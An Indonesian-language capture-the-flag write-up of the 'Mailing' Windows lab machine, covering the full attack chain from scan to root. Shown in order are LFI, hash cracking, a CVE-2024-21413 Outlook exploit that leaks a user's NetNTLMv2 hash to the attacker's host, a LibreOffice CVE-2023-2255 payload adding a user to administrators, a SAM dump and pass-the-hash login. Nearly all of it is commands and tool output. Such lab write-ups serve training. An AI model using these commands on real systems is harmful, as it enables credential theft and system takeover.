# Mailing
Mailing Windows · Easy
#### USer Tldr
* LFI on Port 80
* Cracking hash password of the hMailServer admin email creds
* zero click account leak outlook
#### Root tldr
* LibreOffice CVE-2023-2255
* Dump sam creds
## User Flag
pertama kita scan pakai nmap ipnya
```bash
# Nmap 7.94 scan initiated Thu May 16 02:37:04 2024 as: nmap -sC -sV --verbose -oN reports_10.129.231.40 10.129.231.40
Nmap scan report for 10.129.231.40
Host is up (0.064s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp open smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp open ssl/imap hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-05-15T19:37:36
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 16 02:38:16 2024 -- 1 IP address (1 host up) scanned in 71.32 seconds
```
terdapat smb,imap,pop3, dan http terbuka
lgsg aja masuk ke initial discovery ke port 80 nya kita set dlu di /etc/hosts
```
10.129.231.40 mailing.htb
```
nah kita tau ini pakai hmailserver
### First user initial foothold
lgsg aja search exploitnya dan dpt kalo vuln lfi :
tapi pas di cek gada. lgsg aja kita coba pakai dirsearch
```bash
200 31B http://mailing.htb/download.php
```
nah ada download.php lgsg kita masukin payloadnya
{% embed url="" %}
nah di exploit db sebenrnya pakai program files doang karna program files doang itu gada 404 kita coba di x86 program files dan ada. ke download
```bash
cat hMailServer.INI
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: hMailServer.INI
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ [Directories]
2 │ ProgramFolder=C:\Program Files (x86)\hMailServer
3 │ DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
4 │ DataFolder=C:\Program Files (x86)\hMailServer\Data
5 │ LogFolder=C:\Program Files (x86)\hMailServer\Logs
6 │ TempFolder=C:\Program Files (x86)\hMailServer\Temp
7 │ EventFolder=C:\Program Files (x86)\hMailServer\Events
8 │ [GUILanguages]
9 │ ValidLanguages=english,swedish
10 │ [Security]
11 │ AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
12 │ [Database]
13 │ Type=MSSQLCE
14 │ Username=
15 │ Password=0a9f8ad8bf896b501dde74f08efd7e4c
16 │ PasswordEncryption=1
17 │ Port=0
18 │ Server=
19 │ Database=hMailServer
20 │ Internal=1
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
```
masukin ke file buat kita crack
```bash
cat administrator.hash
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: administrator.hash
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ 841bb5acfa6779ae432fd7a4e6600ba7
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
```
```bash
sudo john administrator.hash --wordlist=/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt --format=Raw-Md5
[sudo] password for replican:
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
homenetworkingadministrator (?)
1g 0:00:00:00 DONE (2024-05-16 04:39) 3.030g/s 22915Kp/s 22915Kc/s 22915KC/s homepc..homeiyun88
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
```
nah kita dapet deh creds emailnya yaitu
:homenetworkingadministrator
### Second user initial foothold
balik ke port 80 tadi dan buka instruction.pdf nya ( download tombol paling bwh )
disini kita tau kalo kita ngesend email nanti sama maya auto diliat ( kita asumsi ada bot buat auto ngeliat setiap message baru )
disini lgsg terpikirkan exploit yg baru2 ini ada di email services outlook. ( gw jg tau nya dari htb forum dikasih hint :v )
{% embed url="" %}
{% embed url="" %}
lgsg aja pakai responder dan cve nya buat gaining zero click account leak
kalo yg gatau apa itu responder itu buat dpetin creds nya maya abis kita ngesend emailnya
```bash
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url "\\10.10.14.45" --subject XD
```
```bash
[SMB] NTLMv2-SSP Client : 10.129.231.40
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:e6a1aa4dfd95ab9f:546ECAE13A0B53BB1E7F662632271430:010100000000000000E3947642A7DA01E6A5C7F43A9AF34D000000000200080032004D005300510001001E00570049004E002D00360033005A003900390041004E004F0059005100580004003400570049004E002D00360033005A003900390041004E004F005900510058002E0032004D00530051002E004C004F00430041004C000300140032004D00530051002E004C004F00430041004C000500140032004D00530051002E004C004F00430041004C000700080000E3947642A7DA0106000400020000000800300030000000000000000000000000200000B5B650195CCF25DA9E362F08460DF10A6043234F3B80DE71CD2B446A1F46FF9D0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00340035000000000000000000
```
nah di responder dapet deh creds hash nya si maya, tinggal kita crack lagi pake hashcat kali ini pakai mode 5600
```bash
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 491 MB
Dictionary cache hit:
* Filename..: /home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f662632271430:010100000000000000e3947642a7da01e6a5c7f43a9af34d000000000200080032004d005300510001001e00570049004e002d00360033005a003900390041004e004f0059005100580004003400570049004e002d00360033005a003900390041004e004f005900510058002e0032004d00530051002e004c004f00430041004c000300140032004d00530051002e004c004f00430041004c000500140032004d00530051002e004c004f00430041004c000700080000e3947642a7da0106000400020000000800300030000000000000000000000000200000b5b650195ccf25da9e362f08460df10a6043234f3b80de71cd2b446a1f46ff9d0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340035000000000000000000:m4y4ngs4ri
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f...000000
Time.Started.....: Thu May 16 03:42:48 2024 (1 sec)
Time.Estimated...: Thu May 16 03:42:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 19633.9 kH/s (3.17ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7340032/14344384 (51.17%)
Rejected.........: 0/7340032 (0.00%)
Restore.Point....: 5505024/14344384 (38.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: minterwint -> ina-123456
Hardware.Mon.#1..: Temp: 52c Fan: 49% Util: 19% Core:1837MHz Mem:7300MHz Bus:16
Started: Thu May 16 03:42:42 2024
Stopped: Thu May 16 03:42:49 2024
```
dan dpet deh lgsg login pakai evil-winrm
```bash
evil-winrm -i 10.129.231.40 -u maya -p m4y4ngs4ri
```
dan ke desktop dapet user flag
## Root Flag
### First root initial foothold
kita cek list program files
```bash
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program
"C:/Program Files (x86)/" "C:/Program Files/" "C:/ProgramData"
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program Files/"
*Evil-WinRM* PS C:\Program Files> ls
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2024 5:30 PM Common Files
d----- 3/3/2024 4:40 PM dotnet
d----- 3/3/2024 4:32 PM Git
d----- 4/29/2024 6:54 PM Internet Explorer
d----- 3/4/2024 6:57 PM LibreOffice
d----- 3/3/2024 4:06 PM Microsoft Update Health Tools
d----- 12/7/2019 10:14 AM ModifiableWindowsApps
d----- 2/27/2024 4:58 PM MSBuild
d----- 2/27/2024 5:30 PM OpenSSL-Win64
d----- 3/13/2024 4:49 PM PackageManagement
d----- 2/27/2024 4:58 PM Reference Assemblies
d----- 3/13/2024 4:48 PM RUXIM
d----- 2/27/2024 4:32 PM VMware
d----- 3/3/2024 5:13 PM Windows Defender
d----- 4/29/2024 6:54 PM Windows Defender Advanced Threat Protection
d----- 3/3/2024 5:13 PM Windows Mail
d----- 3/3/2024 5:13 PM Windows Media Player
d----- 4/29/2024 6:54 PM Windows Multimedia Platform
d----- 2/27/2024 4:26 PM Windows NT
d----- 3/3/2024 5:13 PM Windows Photo Viewer
d----- 4/29/2024 6:54 PM Windows Portable Devices
d----- 12/7/2019 10:31 AM Windows Security
d----- 3/13/2024 4:49 PM WindowsPowerShell
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/"
"C:/Program Files/LibreOffice/CREDITS.fodt" "C:/Program Files/LibreOffice/help/" "C:/Program Files/LibreOffice/program/"
"C:/Program Files/LibreOffice/LICENSE.html" "C:/Program Files/LibreOffice/license.txt" "C:/Program Files/LibreOffice/readmes/"
"C:/Program Files/LibreOffice/NOTICE" "C:/Program Files/LibreOffice/presets/" "C:/Program Files/LibreOffice/share/"
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en"
Cannot find path 'C:\Program Files\LibreOffice\readmes\readme_en' because it does not exist.
At line:1 char:1
+ cat "C:/Program Files/LibreOffice/readmes/readme_en"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Program File...admes\readme_en:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en-US.txt"
======================================================================
LibreOffice 7.4 ReadMe
```
versi 7.4 Libreoffice :
```
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'
```
fungsinya biar maya ada di group admin dan bisa ngedump creds sam
nah abis itu taruh di C:\Important Documents
### Second root initial foothold
user maya jadi punya group administrator lgsg aja dump creds nya si localadmin
```bash
command : crackmapexec smb 10.129.231.40 -u maya -p m4y4ngs4ri --sam
SMB 10.129.231.40 445 MAILING [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.231.40 445 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB 10.129.231.40 445 MAILING [*] Dumping SAM hashes
SMB 10.129.231.40 445 MAILING Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB 10.129.231.40 445 MAILING localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB 10.129.231.40 445 MAILING maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB 10.129.231.40 445 MAILING [+] Added 6 SAM hashes to the database
```
dapet deh tinggal login lgi pake winrm
```bash
evil-winrm -i 10.129.231.40 -u localadmin -H "9aa582783780d1546d62f2d102daefae"
```
done, tinggal ke desktop lgi dan ada root flag